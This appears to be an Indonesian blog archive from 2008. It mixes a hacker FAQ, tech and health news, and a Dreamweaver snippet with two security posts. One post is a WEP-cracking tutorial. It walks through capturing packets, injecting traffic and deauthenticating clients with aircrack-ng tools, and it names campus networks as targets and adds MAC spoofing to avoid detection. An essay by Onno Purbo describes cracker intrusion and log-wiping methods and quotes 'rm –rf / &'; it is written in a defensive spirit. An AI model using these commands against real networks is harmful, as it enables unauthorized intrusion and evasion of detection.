JepunSCRIPT

Langkah Menjadi Seorang Hacker

2008-06-27T22:02:00.001-07:00

[F.A.Q]

T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."
T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri
T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!
T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet
T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!
T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com
T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni
T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)
T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.
T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.
T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.
T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya
T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh
T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)
T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"
T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu
T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.
T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell
T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu
T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb
T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan
T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif
T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.
T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!
T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.
T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok
T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem
T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.
T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )
T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com

ReFerensi :

RFC1392,Internet User Glossary How to Become A Hacker - Eric S Raymond Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
Ezine at http://ezine.echo.or.id
Milis Newbie_hacker@yahoogroups.com
#e-c-h-o room @t DALNET

Experts Revive Debate Over Cellphones and Cancer

2008-06-04T11:53:00.000-07:00

Dr. Vini Khurana, an associate professor of neurosurgery at the Australian National University who is an outspoken critic of cellphones, said: “I use it on the speaker-phone mode. I do not hold it to my ear.” And CNN’s chief medical correspondent, Dr. Sanjay Gupta, a neurosurgeon at Emory University Hospital, said that like Dr. Black he used an earpiece.

Last week, three prominent neurosurgeons told the CNN interviewer Larry King that they did not hold cellphones next to their ears. “I think the safe practice,” said Dr. Keith Black, a surgeon at Cedars-Sinai Medical Center in Los Angeles, “is to use an earpiece so you keep the microwave antenna away from your brain.”

Dr. Vini Khurana, an associate professor of neurosurgery at the Australian National University who is an outspoken critic of cellphones, said: “I use it on the speaker-phone mode. I do not hold it to my ear.” And CNN’s chief medical correspondent, Dr. Sanjay Gupta, a neurosurgeon at Emory University Hospital, said that like Dr. Black he used an earpiece.

Along with Senator Edward M. Kennedy’s recent diagnosis of a glioma, a type of tumor that critics have long associated with cellphone use, the doctors’
remarks have helped reignite a long-simmering debate about cellphones and cancer.

That supposed link has been largely dismissed by many experts, including
the American Cancer Society. The theory that cellphones causebrain tumors “defies credulity,” said Dr. Eugene Flamm, chairman of neurosurgery at Montefiore Medical Center.

According to the Food and Drug Administration, three large epidemiology studies since 2000 have shown no harmful effects. CTIA — the Wireless Association, the leading industry trade group, said in a statement, “The overwhelming majority of studies that have been published in scientific journals around the globe show that wireless phones do not pose a health risk.”

The F.D.A. notes, however, that the average period of phone use in the studies it cites was about three years, so the research doesn’t answer questions about long-term exposures. Critics say many studies are flawed for that reason, and also because they do not distinguish between casual and heavy use.

Cellphones emit non-ionizing radiation, waves of energy that are too weak to break chemical bonds or to set off the DNA damage known to cause cancer. There is no known biological mechanism to explain how non-ionizing radiation might lead to cancer.

But researchers who have raised concerns say that just because science can’t explain the mechanism doesn’t mean one doesn’t exist. Concerns have focused on the heat generated by cellphones and the fact that the radio frequencies are absorbed mostly by the head and neck. In recent studies that suggest a risk, the tumors tend to occur on the same side of the head where the patient typically holds the phone.

Like most research on the subject, the studies are observational, showing only an association between cellphone use and cancer, not a causal relationship. The most important of these studies is called Interphone, a vast research effort in 13 countries, including Canada, Israel and several
in Europe.

Some of the research suggests a link between cellphone use and three types of tumors: glioma; cancer of the parotid, a salivary gland near the ear; and acoustic neuroma, a tumor that essentially occurs where the ear meets the brain. All these cancers are rare, so even if cellphone use does increase risk, the risk is still very low.

Last year, The American Journal of Epidemiology published data from Israel finding a 58 percent higher risk of parotid gland tumors among heavy cellphone users. Also last year, a Swedish analysis of 16 studies in the journal Occupational and Environmental Medicine showed a doubling of risk for acoustic neuroma and glioma after 10 years of heavy cellphone use.

“What we’re seeing is suggestions in epidemiological studies that have looked at people using phones for 10 or more years,” says Louis Slesin, editor of Microwave News, an industry publication that tracks the research. “There are some very disconcerting findings that suggest a problem, although it’s much too early to reach a conclusive view.”

Some doctors say the real concern is not older cellphone users, who began using phones as adults, but children who are beginning to use phones today and face a lifetime of exposure.

“More and more kids are using cellphones,” said Dr. Paul J. Rosch, clinical professor of medicine and psychiatry at New York Medical College. “They may be much more affected. Their brains are growing rapidly, and their skulls are thinner.”

For people who are concerned about any possible risk, a simple solution is to use a headset. Of course, that option isn’t always convenient, and some critics have raised worries about wireless devices like the Bluetooth that essentially place a transmitter in the ear.

The fear is that even if the individual risk of using a cellphone is low, with three billion users worldwide, even a minuscule risk would translate into a major public health concern.

“We cannot say with any certainty that cellphones are either safe or not safe,” Dr. Black said on CNN. “My concern is that with the widespread use of cellphones, the worst scenario would be that we get the definitive study 10 years from now, and we find out there is a correlation.”

Gates Bids Adieu to Developers

2008-06-04T11:48:00.000-07:00

Gates started as a developer 33 years ago when he co-founded Microsoft, and the developers of the Windows OS are a primary reason the company is an industry powerhouse.

The latter is not lost on Gates, who kicked off the TechEd Developers conference Tuesday morning, addressing what is perhaps his company's most loyal audience. He acknowledged their importance to his company. "The success of Microsoft really is due to our relationship with developers," he said.

Gates spoke only briefly about his July 1 transition to spending most of his time at The Bill and Melinda Gates Foundation, calling it "a bit abrupt."

"It will put me in new territory," he said. "That's the first time I've really changed my career since I was 17 years old. I've been completely immersed in software."

Aside from that mention of his upcoming career change, the speech was textbook Gates, who for more than 30 years has been the face of Microsoft and the one responsible for laying out its future vision. On Tuesday he did more of the same, outlining future directions for application development and services, the latter being a more recent topic of interest for his company.

On the former, Gates unveiled Microsoft's future direction application modeling, part of Project Oslo, Microsoft's application-development plan for making it easier for developers to build SOAs (service-oriented architectures). SOAs allow the underlying software running a company's network to communicate with software and pieces of software outside the firewall using standard network and application interfaces to create composite applications.

Microsoft will give developers their first look at Oslo, which will add a common architecture for visually modeling applications in different Microsoft software products, in October at the Professional Developers Conference, Gates said.

"We're taking the kind of models you're seeing rising in specific domains like software management in System Center, data design in SQL Server ... and [putting] them into one model-driven space," he said. "In some ways, it speaks to the dreams about a [central application] repository people have had for decades."

As for services, Gates articulated perhaps more clearly than ever before Microsoft's plans to compete with companies like Google and Amazon.com to provide the industry's largest data centers for hosted services. Microsoft has been late to embrace a hosted-services business model, but has been forced by competition to move more quickly or miss out altogether on new Web-based business models.

"We're taking everything we do at the server level and saying we will have a service that mirrors that exactly," Gates said. "It's getting us to think about data centers at a scale that we haven't thought of before... [to create] a mega-data center that Microsoft and only a few others will have."

Gates also highlighted Microsoft's flagship Web technology, the Internet Explorer (IE) browser, which has been an asset and a curse for the company over the years. While it allowed Microsoft to secure its dominant position in Web-browsing technology, it also triggered Microsoft's U.S. antitrust woes, something that haunts the company to this day. IE also has taken a hit in the past several years as Mozilla Firefox, an open-source browser, has gained a loyal following, forcing Microsoft to step up development and make its own product more innovative.

Gates revealed that beta 2 of the next version of IE, IE 8, will be available in August. He also stumped for what has been his pet interest during his years at Microsoft natural human-interface technology that allows people to interact with computers in ways similar to how they interact with each other. Last week, Microsoft revealed that the next version of Windows, Windows 7, will include touchscreen technology, a fact he mentioned in his talked.

He also reiterated his vision for mini, tablet PCs that allow people to "write" and use other nature interfaces such as speech-recognition technology. Another futuristic technology Gates has promoted at Microsoft is robotics, and he made this interest part of the final discussion of his comments Tuesday. He welcomed onto the stage a Ph.D. candidate from the Massachusetts Institute of Technology (MIT) and the "Ballmer-bot," a robot made to imitate and act like Steve Ballmer, Microsoft's CEO and Gates' long-time business partner, who is not attending TechEd.

"Developers, developers, developers, developers," the robot, developed using Microsoft Robotics Developer Studio product, repeated over and over, in an homage to Ballmer's famous rant. The robot also raised his arm, showing how he has the ability to "throw eggs," according to the MIT student controlling his movements.

tutorial dreamweaver

2008-06-04T11:44:00.000-07:00

Dreamweaver operates based upon the concept of a web site. When you first open the program, Dreamweaver makes you define a site. This helps you keep all files organized. With a simple web site, you will just need to keep a few files within a file folder. However, it is best to plan this out before you start, since folder maintenance will help greatly as your site grows and you start linking to other web pages and adding graphics.

We do have some folder conventions for faculty. If you are updating an existing site, you will want to use the current folder structure. If you are working with others on a site (such as a department, special project, or student club) you will need to work closely so that you can coordinate your files, file structure and layout.

The instructions below assume you are using ACC's tutorial files inside a folder called My Documents.

Open the Site Files window. You can open this window by choosing Site > Site Files.

In the window that opens, choose Define Sites as shown below.

to view all click here

spofing hacking - how to crack web

2008-02-02T02:32:00.000-08:00

Saya tidak tahu apa lagi yg mesti saya posting setelah beberapa minggu lalu kehilangan semua backup postingan dari site yg lama. Sehingga memaksa saya berposting ria disini bersama rekan2 bloger’s wordpress.com. Biar agak keren dikit tapi saya emang dodol, saya akan memberi oleh2 hasil melaut beberapa hari yg lalu. CRACK WEP !!!.

Apa itu CRACK WEP ???….

Saya sendiri juga kurang tahu. Lho … gak tau koq malah di posting ?? . Saya hanya tertarik pada bagian cracking security-nya pada wireless network connection. Selaen itu didaerah kmpus saya ternyata banyak juga lhoo yg wireless area nya diprotect. Nahh, bisa jadi bahan percobaan nih. Tapi sialnya saya gak punya tools utk coba cara ini. Itulah gunanya saya posting disini, jika anda udah berhasil maka secepatnya hubungi saya.

Tutor ini hasil saduran Tutorial yang ditulis oleh glj12 dengan judul asli ” Spoonfed Hacking - How to Crack WEP (Local Hacking) Tutorial ” di leetupload.com

Baiklah langsung saja kita persiapkan apa saja yg dibutuhkan :

1. Laptop (tentunya :D) dg dual boot (Linux n Xp Pro).

2. CD blank untuk mbakar cd (ya iyalah).

3. Wireless Card yg bisa diinject (manipulasi-red) or liat list disini.

4. Baterai yg cukup.

5. Kismet ato netstumbler (jika ingin aman, Kismet didalam BackTrack 2 sudah komplit).

6. Ngerti linux sedikit aja …

Oke Tahap I :

1. Download dulu ISO BackTrack 2 di http://remote-exploit.org/backtrack_download.html, ato langsung ke tahap II jika udah punya Kismet.

2. Bakar ISO nya.

Tahap II :

1. Hidupin BackTrack 2 nya,

2. Klo udah, BT2 alias BackTrack 2 minta username n passwd. Isi dengan root lalu toor

3. Udah?? kita selanjutnya akan masuk GUI. Jika anda penggemar linux, pasti udah tau cara masuk GUI. ketik startx.

4. Jika udah, ntar akan muncul KdE desktop (klo gak slah lhoo… ). Trus masuk konsole

5. Trus ketik kismet dan tekan enter

Pic

6. Secara otomatis Kismet akan meload, mengupdate dan menampilkan semua akses point yang berada di daerah jaringan tsb,

7. Setelah pilih dan memilih target/korban.

8. ketik : iwconfig wlan0 mode monitor

(Syntax: iwconfig device_name_here mode command_monitor). Jangan lupa di enter, terus ??

10. Saatnya ngintip :

Syntax: airodump-ng –-ivs_tipe_ekstensi –-write apaaja –-channel

Jadi perintahnya airodump-ng –ivs –write file_name –channel 11 wlan0

Perintah tsb akan memulai monitoring dan mengoleksi packet dari channel yg diinginkan.

11. Terus Nginject yukk…

Syntax:

aireplay-ng -3 attack level -b BSSID_router_yg_running -h attached_computer_to_the_bssid_the_router wlan0=tipe_device.

aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0

12. kita akan melakukan deauthentication attack. ketik :

Syntax : Aireplay-ng -0 attack_number wlan0 device_type_of_yours -a BSSID_router_yg_running wlan0 tipe_device

aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0

13. Hmm.. saya makin pusing nih. Tapi gak apa kita teruskan ..

Selanjutnya ganti direktori ke file apaaja.ivs yg disave tadi. kemudian eksekusi dengan perintah :

Syntax: aircrack-ng -0 attack_type -n number_of_the_encryption_type(64 or 128) -fudgefactor 2-18 *.cap or *.ivs

aircrack-ng -0 -n 128 -f 4 file_name.ivs

Catt : 00:16:B6:2E:C3:4E >> BSSID dari router yg running

00:14:A5:8A:02:CD >> Computer yg make BSSID (ditampilkan oleh kismet)

wlan0 >> device router yg kita gunain.

-0 >> Jenis serangan

-n >> tipe enkripsi (64 ato 128)

-fudgefactor >> isi 2-18

*.cap ato *.ivs >> ekstensi file yg disave

AKhirnya … binGGOOOOO …. ! . Kita dapetin kunci WEP (hex).

Terus langkah selanjutna tinggal konek ke SSID. ganti Mac address n Netbios nya dulu biar gak ketahuan MAC asli kita. Donlot programnya di irongeek.com atau bisa juga pake KMACS (saran red).

N HAving Fun ……..

hacking bukan sekedar TEORI, nahh …. itulah sebenarna yng benar. Jadi OBROLAN saya diatas tadi adalah bualan belaka. Cos saya belom pernah mempraktekkannya. Karena saya bukan MASTER!!!, jadi saya hanyalah pembual belaka …

Jadi ??? jika anda ingin mencobanya silahkan baca tutor aslinya di

http://www.leetupload.com

http://digg.com/security/Spoonfed_Hacking_How_to_Crack_WEP_Local_Hacking_Tutorial

to be hackers

2008-02-02T02:21:00.000-08:00

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls ' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon setan).

Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm –rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Onno W. Purbo
onno@indo.net.id

deface WS IIS

2008-02-02T02:14:00.000-08:00

